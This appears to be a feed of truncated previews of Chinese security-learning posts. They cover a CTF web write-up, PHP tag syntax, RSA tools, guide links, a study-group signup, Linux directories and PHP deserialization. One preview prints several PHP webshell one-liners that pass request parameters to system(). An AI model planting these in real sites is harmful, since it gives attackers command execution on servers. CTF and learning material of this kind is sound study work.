ISC 2018 藍鯨魔塔線上挑戰賽 Write UpWEB藍鯨文件管理系統首先訪問網站,看到幾個關鍵功能:上傳、改名、刪除。對應的文件為:upload.php,rename.php和delete.php?在網站源文件中找到相應文件并查看結構,發現有全局配置文件:common.inc.php。在co...
PHP Tag<? ?>short_open_tag 決定是否可使用短標記或是編譯php時 --enable-short-tags<?=等價 <? echo自PHP 5.4.0起,always work!<% %>、<%=自PHP 7.0.0起,被移除須將a...
Webshell<?php system($_GET["cmd"]); ?><?php system($_GET[1]); ?><?php system("`$_GET[1]`"); ?><?= system($_GET[cmd]);<?php eva...
今天講解了很多RSA,發現很多不用windows系統的同學有些苦惱~下載地址:https://github.com/ius/rsatool大部分開源工具只能生成RSA秘鑰,對RSA進行加密解密,簽名驗證的應用,但是CTF做題中可能需要用到RSA的秘鑰計算,因為用計算器計算實在是太大了。而且編程效率也...
2017年安全行業年度報告匯總?引言不知覺,2017已經過去了。在過去的一年里,我們做了一些事,包括每周的周刊更新,還有網站每日的各類文章更新,還有公布一些熱心的小伙伴的投稿......我們秉承著分享的精神做這些事,并且還會在2018一直做下去。在此,SecWiki全體成員恭祝諸位新年快樂,萬事如意...
入門指南https://wizardforcel.gitbooks.io/web-hacking-101/content/??????????????????Web Hacking 101 中文版https://wizardforcel.gitbooks.io/asani/content/?????...
即將開啟打卡模式!要參加的同學私信我報名哦~規則如下:1.每一期打卡周期為30天,第一期不分等級。之后分為初級、中級和高級。加入前需要測試哦,通過測試即可加入。加入費用:初級30元,中級60元,高級90元。2.每一期結束將結算按照排名進行獎勵,前三名能夠選擇直接免費進入下一期打卡并且有小禮物相贈(每...
Linux 下各文件夾的結構說明及用途介紹?linux下各文件夾的結構說明及用途介紹:?/bin:二進制可執行命令。/dev:設備特殊文件。/etc:系統管理和配置文件。/etc/rc.d:啟動的配 置文件和腳本。/home:用戶主目錄的基點,比如用戶user的主目錄就是/home/user,可以用...
反序列化PHP - Serialize() / Unserialize()__construct()Object被new時調用,但unserialize()不調用__destruct()Object被銷毀時調用__wakeup()unserialize時自動調用__sleep()被serialize...